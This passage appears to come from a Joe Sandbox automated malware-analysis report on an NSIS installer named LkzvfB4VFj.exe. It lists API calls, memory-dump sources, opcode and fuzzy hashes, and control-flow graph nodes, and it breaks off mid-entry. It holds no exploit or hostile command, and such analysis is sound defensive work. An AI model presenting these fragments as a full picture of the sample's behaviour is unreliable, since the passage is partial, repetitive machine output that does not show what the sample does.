                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                  • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                  • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                  • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                  • GetTickCount.KERNEL32 ref: 00402E6E
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                  • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                  • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                  • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                  APIs
                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Aftopningen Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                  • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                  • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3248276644-3355392842
                                                  • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                  • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                  • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                  • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004051C1
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                    • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                  • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                  • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                  • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,75843410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                  • GlobalFree.KERNEL32(00689268), ref: 00403896
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3355392842
                                                  • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                  • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                  • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                  • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LkzvfB4VFj.exe,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405ADC
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LkzvfB4VFj.exe,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405AEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3370423016
                                                  • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                  • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                  • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                  • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FEB115B
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB11B4
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB11C7
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB11F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: cee62eb4b56c4698e21a80fb01db18aeb2f4dc04b2cd8dceccc9685e1752fd56
                                                  • Instruction ID: 1a3c97de6119e2018845895a73920603566526ef521f8f92a34a9b3d5c3ad3de
                                                  • Opcode Fuzzy Hash: cee62eb4b56c4698e21a80fb01db18aeb2f4dc04b2cd8dceccc9685e1752fd56
                                                  • Instruction Fuzzy Hash: BE318DB1409645AFEB018FE8DB49A667FEAFB47274F24411FE854C6250D738A8118B21
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                  • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                  • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                  • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                  • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:1
                                                  Total number of Limit Nodes:0
                                                  execution_graph 87468 35fd2b90 LdrInitializeThunk

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 35fd34e0-35fd34ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c711c8cace224ed4a3aa67513b4d51176ef84e1f12bda2cf69a45e4b4849e70c
                                                  • Instruction ID: 8ea2745a434a3ea970072350147dc946489e0819d44c17c230186e52da7cc86b
                                                  • Opcode Fuzzy Hash: c711c8cace224ed4a3aa67513b4d51176ef84e1f12bda2cf69a45e4b4849e70c
                                                  • Instruction Fuzzy Hash: CE90023560510403D50072584614707101547D0201FA1CC56A4414528DC7A58A5575E2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2 35fd2d10-35fd2d1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b11c4f954ff9fb5a89ce579578685883c35a846e8237ad894d141ed9f45b33ef
                                                  • Instruction ID: 64981077291def1646ce40a37b4b201a2c456d71110566e1d5227d7fe290c1f4
                                                  • Opcode Fuzzy Hash: b11c4f954ff9fb5a89ce579578685883c35a846e8237ad894d141ed9f45b33ef
                                                  • Instruction Fuzzy Hash: A290023520100413D51172584604707001947D0241FD1CC57A4414518DD6668A56B161

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 35fd2eb0-35fd2ebc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 79b852001e29fd1860edc2bd8a110dd0b72c135b62a4bfc0285f6ea7daa66a45
                                                  • Instruction ID: 3d2f12c0ee08aa24dcaec791ac94f83ef84b2eb1eec0d42cc6222554dfab14a7
                                                  • Opcode Fuzzy Hash: 79b852001e29fd1860edc2bd8a110dd0b72c135b62a4bfc0285f6ea7daa66a45
                                                  • Instruction Fuzzy Hash: 5C90043530140403D500735C4D1470F001547D0303FD1CC57F5154515DC735CD5575F1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 35fd2bc0-35fd2bcc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0ee173b464ef11bc09878611e92046dbac90783b914ec7ee95507b9aa12aa809
                                                  • Instruction ID: 0757c83451b8b5beb15d25b405a00448af600e9475b1c1db2c9e29fdb217a7c6
                                                  • Opcode Fuzzy Hash: 0ee173b464ef11bc09878611e92046dbac90783b914ec7ee95507b9aa12aa809
                                                  • Instruction Fuzzy Hash: EF90023520100403D50076985508647001547E0301F91D856A9014515EC67589957171

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 35fd2b90-35fd2b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1740f24abb573f4d7b10c372959f9f85632d7c6c78314f89d9cb025b4d2764da
                                                  • Instruction ID: de5534d7da97bba410b2c70bb39bcae1adc7314e004de91911aaaaec619f2933
                                                  • Opcode Fuzzy Hash: 1740f24abb573f4d7b10c372959f9f85632d7c6c78314f89d9cb025b4d2764da
                                                  • Instruction Fuzzy Hash: 5D90023520108803D5107258850474B001547D0301F95CC56A8414618DC6A589957161
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2160512332
                                                  • Opcode ID: c2fa337094e560e296e3f70449d969591a9231ba2fd6697c807475873922d07e
                                                  • Instruction ID: 831112d94865e8ccfe4054682d3fd9b45e89e674f4363c73bb084101b0bc1527
                                                  • Opcode Fuzzy Hash: c2fa337094e560e296e3f70449d969591a9231ba2fd6697c807475873922d07e
                                                  • Instruction Fuzzy Hash: 4E928BB9A04341AFE321CF25C882B5BBBE8BB84754F504D6DFA94D7250D770D884CB9A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 613 36039060-360390a9 614 360390ab-360390b0 613->614 615 360390f8-36039107 613->615 616 360390b4-360390ba 614->616 615->616 617 36039109-3603910e 615->617 619 360390c0-360390e4 call 35fd8f40 616->619 620 36039215-3603923d call 35fd8f40 616->620 618 36039893-360398a7 call 35fd4b50 617->618 629 36039113-360391b4 GetPEB call 3603d7e5 619->629 630 360390e6-360390f3 call 360592ab 619->630 627 3603923f-3603925a call 360398aa 620->627 628 3603925c-36039292 620->628 633 36039294-36039296 627->633 628->633 640 360391d2-360391e7 629->640 641 360391b6-360391c4 629->641 639 360391fd-36039210 RtlDebugPrintTimes 630->639 633->618 637 3603929c-360392b1 RtlDebugPrintTimes 633->637 637->618 647 360392b7-360392be 637->647 639->618 640->639 643 360391e9-360391ee 640->643 641->640 642 360391c6-360391cb 641->642 642->640 645 360391f3-360391f6 643->645 646 360391f0 643->646 645->639 646->645 647->618 649 360392c4-360392df 647->649 650 360392e3-360392f4 call 3603a388 649->650 653 36039891 650->653 654 360392fa-360392fc 650->654 653->618 654->618 655 36039302-36039309 654->655 656 3603930f-36039314 655->656 657 3603947c-36039482 655->657 658 36039316-3603931c 656->658 659 3603933c 656->659 660 36039488-360394b7 call 35fd8f40 657->660 661 3603961c-36039622 657->661 658->659 662 3603931e-36039332 658->662 663 36039340-36039391 call 35fd8f40 RtlDebugPrintTimes 659->663 678 360394f0-36039505 660->678 679 360394b9-360394c4 660->679 665 36039674-36039679 661->665 666 36039624-3603962d 661->666 669 36039334-36039336 662->669 670 36039338-3603933a 662->670 663->618 705 36039397-3603939b 663->705 667 36039728-36039731 665->667 668 3603967f-36039687 665->668 666->650 673 36039633-3603966f call 35fd8f40 666->673 667->650 677 36039737-3603973a 667->677 674 36039693-360396bd call 36038093 668->674 675 36039689-3603968d 668->675 669->663 670->663 690 36039869 673->690 702 360396c3-3603971e call 35fd8f40 RtlDebugPrintTimes 674->702 703 
36039888-3603988c 674->703 675->667 675->674 684 36039740-3603978a 677->684 685 360397fd-36039834 call 35fd8f40 677->685 681 36039511-36039518 678->681 682 36039507-36039509 678->682 686 360394c6-360394cd 679->686 687 360394cf-360394ee 679->687 693 3603953d-3603953f 681->693 691 3603950b-3603950d 682->691 692 3603950f 682->692 697 36039791-3603979e 684->697 698 3603978c 684->698 715 36039836 685->715 716 3603983b-36039842 685->716 686->687 689 36039559-36039576 RtlDebugPrintTimes 687->689 689->618 719 3603957c-3603959f call 35fd8f40 689->719 699 3603986d 690->699 691->681 692->681 706 36039541-36039557 693->706 707 3603951a-36039524 693->707 700 360397a0-360397a3 697->700 701 360397aa-360397ad 697->701 698->697 709 36039871-36039886 RtlDebugPrintTimes 699->709 700->701 710 360397b9-360397fb 701->710 711 360397af-360397b2 701->711 702->618 745 36039724 702->745 703->650 717 360393eb-36039400 705->717 718 3603939d-360393a5 705->718 706->689 712 36039526 707->712 713 3603952d 707->713 709->618 709->703 710->709 711->710 712->706 721 36039528-3603952b 712->721 723 3603952f-36039531 713->723 715->716 724 36039844-3603984b 716->724 725 3603984d 716->725 720 36039406-36039414 717->720 726 360393d2-360393e9 718->726 727 360393a7-360393d0 call 36038093 718->727 742 360395a1-360395bb 719->742 743 360395bd-360395d8 719->743 729 36039418-3603946f call 35fd8f40 RtlDebugPrintTimes 720->729 721->723 731 36039533-36039535 723->731 732 3603953b 723->732 733 36039851-36039857 724->733 725->733 726->720 727->729 729->618 749 36039475-36039477 729->749 731->732 738 36039537-36039539 731->738 732->693 739 36039859-3603985c 733->739 740 3603985e-36039864 733->740 738->693 739->690 740->699 746 36039866 740->746 747 360395dd-3603960b RtlDebugPrintTimes 742->747 743->747 745->667 746->690 747->618 751 36039611-36039617 747->751 749->703 751->677
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
